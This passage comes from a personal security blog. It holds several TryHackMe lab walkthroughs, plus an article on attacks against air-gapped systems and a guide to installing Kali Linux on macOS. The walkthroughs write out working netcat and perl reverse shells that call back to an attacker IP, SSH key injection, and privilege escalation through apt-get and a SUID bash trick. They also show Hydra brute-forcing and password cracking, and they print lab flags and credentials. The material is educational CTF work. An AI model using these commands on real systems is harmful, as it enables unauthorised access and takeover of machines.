flag:\n6470e394cbf6dab6a91682cc8585059bPrivilege EscalationLooking at the FuelCMS structure, we check for database configuration files:\ncd /var/www/html/fuel/application/config/ls -lacat database.php$ cat database.php\n\u0026lt;?php\ndefined(‘BASEPATH’) OR exit(‘No direct script access allowed’);\n*/\n$active_group = ‘default’;\n$query_builder = TRUE;\n$db[‘default’] = array(\n‘dsn’ =\u0026gt; ‘’,\n‘hostname’ =\u0026gt; ‘localhost’,\n‘username’ =\u0026gt; ‘root’,\n‘password’ =\u0026gt; ‘mememe’,\n‘database’ =\u0026gt; ‘fuel_schema’,\n‘dbdriver’ =\u0026gt; ‘mysqli’,\n‘dbprefix’ =\u0026gt; ‘’,\n‘pconnect’ =\u0026gt; FALSE,\n‘db_debug’ =\u0026gt; (ENVIRONMENT !== ‘production’),\n‘cache_on’ =\u0026gt; FALSE,\n‘cachedir’ =\u0026gt; ‘’,\n‘stricton’ =\u0026gt; FALSE,\n‘failover’ =\u0026gt; array(),\n‘save_queries’ =\u0026gt; TRUE\n);\n// used for testing purposes\nif (defined(‘TESTING’))\n{\n@include(TESTER_PATH.’config/tester_database’.EXT);\n}\nWe find credentials:\nUsername: rootPassword: mememeWhen we try su root, we get an error:\nsu rootsu: must be run from a terminal\nTo get around this, we spawn a fully interactive TTY shell:\npython -c ‘import pty;pty.spawn(“/bin/bash”)’Now, we switch to root using the credentials found:\nsu rootmememe (password)cd /rootls -lacat root.txtb9bbcb33e11b80be759c4e844862482dCONCLUSION:I hope this write-up walkthrough was helpful to you all! This room covered:\nWeb Enumeration (Feroxbuster, CMS identification)Remote Code Execution (FuelCMS exploit)Reverse Shells (Netcat, interactive TTY)Privilege Escalation (Database credentials \u0026amp; LinPEAS)Now that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"29 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/ignite-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"IGNITE— TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “SMAG GROTTO.” SMAG GROTTO — TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “SMAG GROTTO.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a web-page.\nI then initiate an Nmap scan and run a Feroxbuster scan.\nnmap 10.10.6.30 — open -sV -Ohttp://10.10.6.30/mail/Opening the PCAP file in Wireshark, we filter for HTTP POST requests\nRight-click on the request → Follow HTTP StreamWe find credentials:Username: helpdeskPassword: cH4nG3M3_n0wWe also discover the subdomain developments.smag.thmNext, we edit the /etc/hosts file to resolve this subdomain:\nsudo nano /etc/hostsAdd this line:\n10.10.6.30 developments.smag.thmWe save the file and open http://developments.smag.thm in the browser\nNext, We navigate to /login.php and enter the username \u0026amp; password\nUsername: helpdeskPassword: cH4nG3M3_n0wInside, we try executing commands, but it doesn’t work. So, we set up a reverse shell\nOpen a Netcat listener on our machine on a new terminal tab:\nnc -lvnp 1234Execute the reverse shell payload:\nrm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc 10.4.1.240 1234 \u0026gt;/tmp/f{Replace 10.4.1.240 with our system IP/vpn ipand 1234 with our chosen port}\nOnce we get a shell, we upgrade it to an interactive TTY:\npython3 -c ‘import pty; pty.spawn(“/bin/bash”)’We now have access as www-data\nFinding SSH Key for Privilege Escalation:We attempt to read user.txt, but it's restricted.\nChecking Crontab, we find a reference to an RSA key backup\ncat /etc/crontabNavigating to the backup folder:\ncd /opt/.backupsls -lacat jake_id_rsa.pub.backupWe decide to replace the SSH key with our own\nGenerating \u0026amp; Injecting an SSH Key:On our local machine, we generate an SSH key:\nssh-keygen -t rsaFilename: jakethmNo passphraseCopy the public key:\ncat jakethm.pubIt outputs something like this: ssh-rsa AAAAB3… root@kali\nReplace the existing key on the target machine:\necho “ssh-rsa AAAAB3… root@kali” \u0026gt; jake_id_rsa.pub.backupThis ensures our key is now used for authentication, post confirmation:\nNow, we navigate to Jake’s home directory:\ncd /home/jakewhoamiWe are still www-data, so we attempt SSH access\nLogging in as Jake via SSH:On our local machine, we use our private key to SSH into Jake’s account:\nssh -i jakethm jake@10.10.6.30Once inside:\npwdcd /homecat user.txtWe successfully retrieve user.txt\niusGorV7EbmxM5AuIe2w499msaSuqU3jNext checking sudo privileges:\nsudo -lWe see that apt-get can be run as root\nUsing GTFOBins: https://gtfobins.github.io/gtfobins/apt-get/#sudo , we find an exploit for apt-get:\nsudo apt-get update -o APT::Update::Pre-Invoke::=/bin/shThis grants us a root shell!\nNow, we retrieve the final flag\ncd /rootcat root.txtuJr6zRgetaniyHVRqqL58uRasybBKz2TCONCLUSIONI hope this write-up walkthrough was helpful to you all! This room covered:\nNmap \u0026amp; Feroxbuster (Port scanning \u0026amp; directory enumeration)PCAP Analysis (Extracting credentials from HTTP requests)Reverse Shells (Netcat, TTY upgrade)SSH Key Injection (Hijacking an existing user’s key)Privilege Escalation (Exploiting apt-get via GTFOBins)Now that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"27 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/smag-grotto-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"SMAG GROTTO — TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Pickle Rick.” PICKLE RICK — TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Pickle Rick.”\nThis room was a very fun room and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nWe Start with an Nmap scan to check open ports:\nnmap 10.10.137.72 — openThen I Run Feroxbuster to find hidden directories:\nferoxbuster -u http://10.10.137.72 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtThen to the webpage:\nFrom the Feroxbuster scan, I see there is a login.php page but I have no credentials, apart from this there is even /assets and robots.txt\nI then inspect the page and see a username\nOn checking robots.txt, I find a password-like string\nAnd, inspecting the page at portals.php I see this :\nThen I head over to login.php and try using the found credentials\nOnce I’m Successfully logged in, I look through but there are no direct options to retrieve a flag\nThen I Inspect the page source → Base64 encoded text found\nDecoding the Base64 → No useful information\nThen I see there is a Command Execution Panel that allows us to run system commands.\nTesting simple Linux commands like ls, pwd, and whoami works, meaning Remote Code Execution (RCE) is possible\nThis is the key, and I suggest that all of you refer to this repo: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md\nSo I set up a Reverse Shell:\nrm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2\u0026gt;\u0026amp;1 | nc 10.4.1.240 1234 \u0026gt;/tmp/f{Replace 10.4.1.240 with your system IP, and 1234 with your listening port}\nBack to the terminal, open a Netcat listener in another tab:\nnc -lvnp 1234That did not work so I changed the rev shell and used this :\nperl -e ‘use Socket;$i=”10.4.1.240\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”\u0026gt;\u0026amp;S”);open(STDOUT,”\u0026gt;\u0026amp;S”);open(STDERR,”\u0026gt;\u0026amp;S”);exec(“/bin/sh -i”);};’Now when you execute this on the panel the listner catches it and we gain shell access .\nNow that we are in:\ncat Sup3rS3cretPickl3Ingred.txtFind the second ingredient in the /home directory but it doesn’t open\nRealize the filename has a space\ncat “second ingredients”Then Check sudo permissions by:\nsudo -lIt shows ALL permissions, meaning we can escalate easily\nsudo suNavigate to /root and get the final flag:\ncat 3rd.txtFlag 1: mr. meeseek hairFlag 2: 1 jerry tearFlag 3: fleeb juiceConclusionI hope this write-up walkthrough was helpful to you all! This room covered Web Enumeration, RCE Exploitation, Reverse Shells, and Privilege Escalation.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup\n","date":"22 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/pickle-rick-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"PICKLE RICK — TRY HACK ME-ROOM","type":"writeups"},{"content":" In cybersecurity, few ideas have the same mythic aura as the “air gap.” Air-Gapped Systems in 2025: Secure by Design or Security Theater?AIR GAPPED SYSTEMSIn cybersecurity, few ideas have the same mythic aura as the “air gap.”\nA system physically disconnected from any network — no internet, no LAN, no wireless, no cloud — the digital equivalent of sealing secrets in a lead-lined vault.\nWe believe these systems are safe, protected from threats that exist in the outside world. But is isolation enough to ensure complete security?\nTo start it off I want to share one of my favorite story:\nThe late Jeremiah Denton, a U.S. naval aviator and former senator, became a symbol of resilience and resourcefulness during the Vietnam War.\nThe late Jeremiah Denton: The A-6 Intruder pilot on the left and U.S. Senator on the right.In 1965, Denton was leading a bombing mission over North Vietnam in his A-6 Intruder when his aircraft was struck by a bomb from his own squadron.\nForced to eject (shoutout to Martin-Baker, obviously), Denton and his crew were captured and held as prisoners of war for nearly eight years.\nDuring his captivity, Denton was part of a press conference with other American POWs.\nThe enemy tried to use him for propaganda, but Denton had other plans.\nJeremiah Denton spelling Torture through BlinkingUnder duress, he blinked out the word “TORTURE” in Morse code, sending crucial information to the outside world about the prisoners’ conditions — all while being completely isolated from any external help.\nNow how does this associate with my Air Gaps you wonder?\nIt follows a simple law that I always believe in: it shows that even in the most isolated environments, information can still be moved in \u0026amp; out.\nIn this case through clever Morse code or something more subtle. Just like Denton found a way to communicate despite his confinement, attackers have found ways to bypass the isolation of air-gapped systems.\nWhat Exactly Is an Air-Gapped System?For those who know — and for those who have no idea — here’s the deal with air-gapped systems.\nNo Ethernet or Wi-Fi connectivityNo Bluetooth or wireless peripheralsNo external access unless explicitly controlled (e.g. via removable media)Used extensively in military, critical infrastructure, nuclear plants, and high-value corporate R\u0026amp;D, these systems are considered high-assurance environments.\nBut here’s the problem: air-gapped ≠ attack-proof.\nTom Cruise beat us to it — air-gapped computer infiltration, Mission: Impossible style.Let’s break down how attackers bypass these “unbreachable” defenses — and why relying solely on air-gapping in 2025 is no longer enough.\nStuxnet: The First Big Wake-Up CallThe infamous Stuxnet: The cyber weapon to successfully breach and disrupt air-gapped nuclear systemsLet’s rewind to 2010, the year Stuxnet changed everything.\nIn 2010, global tensions were rising over Iran’s nuclear program.\nWestern intelligence agencies feared Iran was moving closer to developing a nuclear weapon, despite international sanctions and diplomacy.\nBehind the scenes, a new kind of weapon was already in play.\nStuxnet was the first publicly known malware to successfully target air-gapped systems — specifically, Iranian centrifuges used in nuclear enrichment.\nHow Stuxnet workedIt didn’t spread over the internet. It didn’t rely on phishing emails.Instead, it hitched a ride — on a simple USB flash drive.\nOnce inside Iran’s Natanz nuclear facility, the malware moved with surgical precision. It exploited four zero-day vulnerabilities, carried legitimate digital certificates to avoid detection, and wormed its way deep into isolated networks that weren’t supposed to be reachable.\nBut it didn’t stop at spying.\nStuxnet took control of the centrifuges used to enrich uranium, subtly manipulating their stepper motors — speeding them up, slowing them down — until the machines began to fail.\nAnd all the while, it fed false readings back to operators, making everything look normal.\nThe attack proved a sobering truth: air-gaps may block signals, but they don’t block people.\nNow, 2010 feels like a lifetime ago.\nThe world has changed, tech has evolved — and honestly, back then, I was just a kid with no clue how a computer even worked.\nProbably wandering through school, not paying attention in class, and definitely not imagining myself sitting in front of a screen writing about cybersecurity.\nYet here we are.\nAnd just like I’ve grown — and I’m sure you’ve all leveled up too, whether it’s in your careers or just in binge-watching skills — the threats have evolved as well.\nRAMBO — 2023 Proof-of-Concept for Magnetic ExfiltrationIn 2023, RAMBO took the cybersecurity world by surprise, exposing a new vulnerability in air-gapped systems.\nWhile past attacks like Stuxnet relied on USB drives, RAMBO proved that magnetic fields from RAM chips themselves could be exploited to leak data.\nHow it worksHere’s how it works:\nWhen a computer’s RAM undergoes intense read/write operations, it emits faint magnetic signals.\nMalware can then manipulate this activity to encode binary data into these magnetic waves.\nThis is the epitome of stealth in my eyes\nWhat makes this attack so stealthy?\nYou don’t need anything complex — just a smartphone with a magnetometer (which, by the way, most smartphones have these days).\nIf the phone is placed about 5–10 cm away from the system, it can pick up these magnetic signals and decode the hidden data.\nNo external devices, no extra software, no drivers required — just a script in the RAM and a phone quietly listening.\nThe exfiltration rate is slow — just a few bits per second. But that’s still enough to leak critical information, like encryption keys, credentials, or command instructions, all without triggering any alarms.\nAs if that wasn’t enough, in 2024 came the Golden Jackal.\nGolden JackalThe Final BossA new threat emerges — Golden Jackal, an advanced persistent threat (APT) group, quietly infiltrating diplomatic and government systems across Asia and Europe, including air-gapped environments.\nBut this wasn’t a loud, aggressive attack. It was surgical, slow, and devastatingly effective.\nThe Attack Flow:\nAttack Flow of the Golden USB \u0026amp; DealerGolden Jackal started on internet-connected machines, often the outer layer of a secure network. The group didn’t rush in; they waited patiently.\nThey kept a watchful eye for any USB insertions. The moment they spotted one, they loaded a stealthy payload onto the drive.\nThe tools involved — such as Golden Dealer , Golden USB Copy and Jackal Screen Watcher — were designed for stealth, modularity, and adaptability.\nThat USB would eventually make its way to an air-gapped system.\nOnce inserted, the malware silently executed within the secure environment, bypassing all security measures.\nGolden UsbCopy \u0026amp; Golden DealerWhat followed was even more insidious:Sensitive data, like documents, encryption keys, and certificates, were harvested and quietly stored on the USB.\nAnd once that USB was reconnected to a networked device, the data was exfiltrated — automatically.\nNo obvious signs of suspicious activity.\nNo beaconing to command and control servers. Just silent persistence.\nThis primarily targeted diplomatic and government systems in Asia and Europe, affecting critical infrastructures and highly sensitive data.\nThe group’s stealthy and persistent methods led to multiple breaches in air-gapped systems, which were previously considered immune to remote attacks.\nThe impact was felt across several sectors, from foreign ministries to military agencies, as the group quietly exfiltrated confidential documents, encryption keys, and internal communications.\nDespite the low-and-slow nature of the attack, data exfiltration rates were consistent.\nThis data remained undetected for months, raising alarms about the true scale of the breach.\nWhen Silence Speaks — Proximity AttacksOkay, but what if you block USBs?\nWhat if your air-gapped system is in a sealed room, with no access points and strict access control?\nWhat if it’s truly offline?\nI hate to break it to you but- You’re still not safe.\nEnter Side-Channel and Proximity Attacks\nHow Side-Channel attack worksOver the past decade, researchers have demonstrated how attackers can exfiltrate data from air-gapped systems using these sneaky methods:\nAcoustic signals (MOSQUITO, Fansmitter): Using speakers or fans that emit high-frequency tones undetectable by the human ear, attackers can capture these with nearby microphones.LED signals (xLED, LED-it-GO): Status lights blinking in binary patterns, which can be captured by cameras from a distance.Electromagnetic radiation (AirHopper, GSMem): Components like RAM and video cards emit electromagnetic fields that can be intercepted using antennas or radios.Defending the Modern Air GapCheyenne Mountain Complex, backup command CentreAir-gapped systems are far from obsolete — they remain critical in high-assurance environments like military operations, critical infrastructure, and sensitive R\u0026amp;D.\nBut to stay secure in 2025, we must treat them as soft targets with hard shells\nSome Controls are:\nDisable autorun and enforce strong USB media policies to prevent automatic execution of malware.\nUse hardware-enforced data diodes for one-way data transfer, ensuring no two-way communication can occur\nPhysically isolate systems in RF- and EM-shielded enclosures to block unwanted electromagnetic emissions\nBan smartphones and smart devices from proximity to air-gapped systems. They’re Trojan horses waiting to happen\nMonitor and log user activity, even for offline systems, to detect any unusual behavior\nAnd last, Educate users that “offline” does not mean “immune” — the human element is often the weakest link\nConclusionAir-gapped control rooms: isolated by design, critical by functionThe air gap is not dead — far from it.\nBut in 2025, it requires more than just physical isolation to stay secure.\nAs we’ve seen from attacks like Stuxnet, Golden Jackal, and RAMBO, no system, no matter how isolated, is truly safe.\nWith the rise of proximity and side-channel attacks, defending air-gapped environments demands vigilance, layered defenses, and a deep understanding that the real threat might be closer — and quieter — than we realize.\nDefending air-gapped systems means thinking beyond the cable.It means treating them not as impenetrable vaults, but as glass houses, vulnerable to even the faintest ripple.\nI personally believe, silence doesn’t mean safety — it might just mean we haven’t learned how to listen yet.\nSo ask yourself:Are we truly disconnected — or just blind to the ways we’re still exposed?\nReferenceshttps://www.sentinelone.com/cybersecurity-101/cybersecurity/what-is-an-air-gap/https://www.f5.com/labs/articles/cisotociso/attacking-air-gap-segregated-computershttps://news.ycombinator.com/item?id=17099969https://www.bleepingcomputer.com/news/security/european-govt-air-gapped-systems-breached-using-custom-malware/https://thehackernews.com/2024/10/goldenjackal-target-embassies-and-air.html ","date":"20 April 2025","externalUrl":null,"permalink":"/articles/security-research-articles/air-gapped-systems-in-2025-secure-by-design-or-security-theater/","section":"Security Research \u0026 Articles","summary":"","title":"Air-Gapped Systems in 2025: Secure by Design or Security Theater?","type":"articles"},{"content":"","date":"20 April 2025","externalUrl":null,"permalink":"/articles/security-research-articles/","section":"Security Research \u0026 Articles","summary":"","title":"Security Research","type":"articles"},{"content":" Why this Guide: How to Install Kali Linux on macOS (Apple Silicon) Using VMware Fusion — Step-by-Step GuideWhy this Guide:This is a different kind of write-up than I usually post here, but I figured I’d share it because it might save someone else the head-scratching I went through.\nI recently had to download and set up Kali Linux — but doing it on a Mac (especially being new to the environment) turned out to be a bit more confusing.\nI tried a few options. UTM was okay, but in the end, VMware Fusion gave me better performance and flexibility.\nSo here’s a clean, step-by-step walkthrough I put together to help you set up Kali Linux on a Mac using VMware Fusion, without the confusion.\n⚠️ Quick DisclaimerI know some folks prefer using other setups — like dedicated Linux boxes, cloud machines, or tools like Parallels instead of VMware.\nAnd that’s totally valid.\nThis writeup is just based on my personal preference and current workflow using a Mac with Apple Silicon.\nI found VMware Fusion to be smoother and more responsive than UTM, and figured it was worth documenting. But you should absolutely use whatever works best and feels comfortable for you!\nWhat You’ll Need:A Mac with an M1, M2, M3, M4 chip (Apple Silicon)Stable Internet connection25–40 GB free space20–30 minutes of time(Optional) anything to snack onStep 1: Download Kali Linux ISOHead to the official Kali Linux website:\nhttps://www.kali.org/get-kali/#kali-platformsScroll to Installer Images\nDirect link to Installer ImagesUnder “Apple Silicon (ARM64)”, click Download under the recommended installer.\nThis ISO is designed to run on Macs with Apple Silicon, so don’t download the regular x64 version — it won’t work.\nStep 2: Download VMware FusionVMware Fusion is now free for personal use. But since VMware is owned by Broadcom, you’ll need to register to download it.\nFirst, read the announcement here (optional ): VMware Fusion Now FreeThen head to the download page: Download VMware FusionCreate a Broadcom account (or log in if you already have one)\nAccept the terms, verify your email, and you’ll get access to the downloads.\nChoose the Apple Silicon version, and click Download.\nOnce it’s downloaded, double-click the .dmg file to install VMware Fusion.\nStep 3: Set Up Your Kali Virtual MachineOpen VMware Fusion from Applications.\nChoose: “Install from disc or image”\nDrag and drop the Kali ISO, or click to browse and select it.\nFor OS type:\nChoose LinuxVersion: Debian 12 (since Kali is based on Debian)Click Customize Settings, and name your VM something like Kali_VM.\nNext click on processor and memory and set it at 4096 and you can leave at 2 cores or 4 cores based on system\nThen click back on show all and navigate to hard disk and set it as 45 or 50 gb\nThen click back on show all and close it and then click on the play button icon\nMemory (RAM): 4096 MB (4GB)CPU Cores: 2 or 4 depending on your MacDisk Size: 45–50 GBStep 4: Install Kali Linux (Graphical Installer)On the boot menu, use arrow keys to select Graphical install → press EnterFollow the steps:Language → English (or your preference)\nRegion → for timezone\nKeyboard → e.g. US\nSet the system info:\nHostname → kali\nDomain name → leave empty\nFull name → anything you like\nUsername → your choice\nPassword → strong one that you’ll remember lol\nNext,\nDisk setup:\nUse Guided — use entire diskSelect All files in one partitionChoose Yes when asked to write changesLet the install finish (it might take a few minutes)Choose default software options, then install GRUB when prompted.Hit Continue to reboot once everything’s done.\nStep 5: Boot into Kali \u0026amp; EnjoyAfter rebooting, you’ll see the Kali login screen.\nLogin with the username and password you setBoom! You’re in Kali on your Mac 🎉Make sure you hit the terminal and run\nsudo apt upgradesudo apt updateCONCLUSIONI hope this write-up walkthrough was helpful to you all!\nThis one was a bit different from my usual CTF or pwn box writeups, but I wanted to clearly lay out the process of setting up Kali Linux on macOS using VMware Fusion — especially since things can be tricky when you’re new to the Mac environment or dealing with Apple Silicon.\nNow that I’ve gotten through it, I hope it helps you and gets you running with a working Kali box too.\nIf you guys want me to cover any specific setup, tool, or challenge, or if you have any questions, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"15 April 2025","externalUrl":null,"permalink":"/articles/technisch/how-to-install-kali-linux-on-macos-apple-silicon-using-vmware-fusion-step-by-step-guide/","section":"Security Research \u0026 Articles","summary":"","title":"How to Install Kali Linux on macOS (Apple Silicon) Using VMware Fusion — Step-by-Step Guide","type":"articles"},{"content":" Hello everyone! This is an easy room from the TryHackMe platform called “CYBORG”. CYBORG — THM — WRITEUPHello everyone! This is an easy room from the TryHackMe platform called “CYBORG”.\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nThe people who read my walkthroughFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s paste the IP address and connect to the network. This is what we have in front of us: A default Apache page\nIn the terminal: Run Nmap to check for open ports\nnmap 10.10.128.43 — openThen I Find:\nPort 22 (SSH) is openPort 80 (HTTP) is openThen I run Feroxbuster to find hidden directories\nferoxbuster -u http://10.10.128.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtThen I find:\n/admin/etcI then visit /admin and I see:\nIt Contains conversations between users.Mentions Squid Proxy and backup music_archive.Dropdown downloads archive.tar (we will analyze this later).Next I visit /etc and /etc/squid\nFound passwd file:music_archive:I then copy this hash and go back to my terminal\nI create a file and paste the hash in it :\ngedit cc.txtThen I run the legendary combination “john the ripper + rockyou.txt”\njohn cc.txt — wordlist=/usr/share/wordlists/rockyou.txtBy doing this I get the password:\nCracked password: squidward\nNow going to the backup file, it is in the format of Borg Backup\nI go online and search it up and see a few pages:\nNow in the terminal I perform the installation first:\nsudo apt update \u0026amp;\u0026amp; sudo apt install borgbackupMove to the folder where archive.tar is downloaded\nExtract the archive.tar:\ntar xf archive.tarNavigate through directories:\nlscd homelscd fieldcd devcd final_archiveNext I Check Borg archive details:\n─$ borg info .Enter passphrase for key /home/kali/Downloads/home/field/dev/final_archive: squidward\nRepository ID: ebb1973fa0114d4ff34180d1e116c913d73ad1968bf375babd0259f74b848d31\nLocation: /home/kali/Downloads/home/field/dev/final_archive\nEncrypted: Yes (repokey BLAKE2b)\nCache: /home/kali/.cache/borg/ebb1973fa0114d4ff34180d1e116c913d73ad1968bf375babd0259f74b848d31\nSecurity dir: /home/kali/.config/borg/security/ebb1973fa0114d4ff34180d1e116c913d73ad1968bf375babd0259f74b848d31\n— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —\nOriginal size Compressed size Deduplicated size\nAll archives: 1.49 MB 1.49 MB 1.50 MB\nUnique chunks Total chunks\nChunk index: 99 99\n─$ borg list .Enter passphrase for key /home/kali/Downloads/home/field/dev/final_archive: squidward\nmusic_archive Tue, 2020–12–29 19:30:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]\nThen we see the file addy location and perform this to explore the extracted file:\n─$ borg extract /home/kali/Downloads/home/field/dev/final_archive/::music_archiveEnter passphrase for key /home/kali/Downloads/home/field/dev/final_archive: squidward\nLs\nCd alex\n─$ ls -la *\nDesktop:\ntotal 12\ndrwxrwxr-x 2 kali kali 4096 Dec 29 2020 .\ndrwxr-xr-x 12 kali kali 4096 Dec 29 2020 ..\n-rw-r — r — 1 kali kali 71 Dec 29 2020 secret.txt\nDocuments:\ntotal 12\ndrwxrwxr-x 2 kali kali 4096 Dec 29 2020 .\ndrwxr-xr-x 12 kali kali 4096 Dec 29 2020 ..\n-rw-r — r — 1 kali kali 110 Dec 29 2020 note.txt\nDownloads:\ntotal 8\ndrwxrwxr-x 2 kali kali 4096 Dec 28 2020 .\ndrwxr-xr-x 12 kali kali 4096 Dec 29 2020 ..\nThat shows 2 files:\nDesktop: secret.txtDocuments: note.txt → Contains login:alex:S3cretP@s3\nWhich is the username and password for SSH\nSSH AccessThen immediately I go on to quickly extract the user.txt with the commands :\nssh alex@10.10.128.43ls -lacd /home/alexcat user.txtUser.txt flag:\nflag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}Privilege EscalationCheck sudo permissions:\nsudo -lThen we see this :\n(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh\nWe see the file backup.sh can be executed as a root, so we start of by entering the directory:\nalex@ubuntu: cd /etc/mp3backups/alex@ubuntu/etc/mp3backups$: cat backup.sh#!/bin/bash\nsudo find / -name “*.mp3” | sudo tee /etc/mp3backups/backed_up_files.txt\ninput=”/etc/mp3backups/backed_up_files.txt”\n#while IFS= read -r line\n#do\n#a=”/etc/mp3backups/backed_up_files.txt”\n# b=$(basename $input)\n#echo\n# echo “$line”\n#done \u0026lt; “$input”\nwhile getopts c: flag\ndo\ncase “${flag}” in\nc) command=${OPTARG};;\nesac\ndone\nbackup_files=”/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3\"\n# Where to backup to.\ndest=”/etc/mp3backups/”\n# Create archive filename.\nhostname=$(hostname -s)\narchive_file=”$hostname-scheduled.tgz”\n# Print start status message.\necho “Backing up $backup_files to $dest/$archive_file”\necho\n# Backup the files using tar.\ntar czf $dest/$archive_file $backup_files\n# Print end status message.\necho\necho “Backup finished”\ncmd=$($command)\necho $cmd\nNext I Try editing the script (won’t work due to permissions)\nTo tackle this I use echo (revshell could also be used)\necho ‘chmod +s /bin/bash’ \u0026gt;\u0026gt; /etc/mp3backups/backup.shThe \u0026gt;\u0026gt; operator appends the echoed text (chmod +s /bin/bash) to the file /etc/mp3backups/backup.sh.'chmod +s /bin/bash' is a command that sets the SUID (Set User ID) bit on /bin/bash, allowing any user who executes bash to gain the permissions of the file ownerIf backup.sh is executed later (e.g., by root via a cron job or another automated process), it will run chmod +s /bin/bash.Then:\nsudo /etc/mp3backups/backup.shlscd /rootcat root.txtflag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}CONCLUSION:I hope this writeup walkthrough from my end was helpful to you guys.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well.\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"13 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/cyborg-thm-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"CYBORG — THM — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is an easy room from the TryHackMe platform called “Brookly Nine Nine ”. BROOKLYN NINE NINE — THM — WRITEUPHello everyone! This is an easy room from the TryHackMe platform called “Brookly Nine Nine ”.\nThis was one of the easiest rooms and a very fun room for beginners to try out .\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready\nOnce it is deployed, we start by visiting the webpage.\nThen I Inspect the page source (Right-click → Inspect or Ctrl + U)\nI Notice a .jpg file mentioned.\nThe hint suggests using steganography, so download the image and then\nstrings image.jpgsteghide extract -sf image.jpgBut no luck with this, so I go back to terminal and run the nmap:\nnmap -sV -A -p- 10.10.121.215Through this I find:\nFTP (21) open → Possible anonymous login.SSH (22) open → Potential entry point.Exploiting FTP (Anonymous Login)Connect to FTP\nftp 10.10.121.215Name: anonymous Password: anonymousOnce in:\nls -laget note_to_jake.txtexitNow once out of the ftp:\ncat note_to_jake.txtThe note hints the username to ssh is Jake, yet the password is not known\nThis makes me turn to Hydra:\nhydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.121.215kaboom!\nUsername: jakePassword: 987654321SSH AccessNow we login to SSH :\nssh 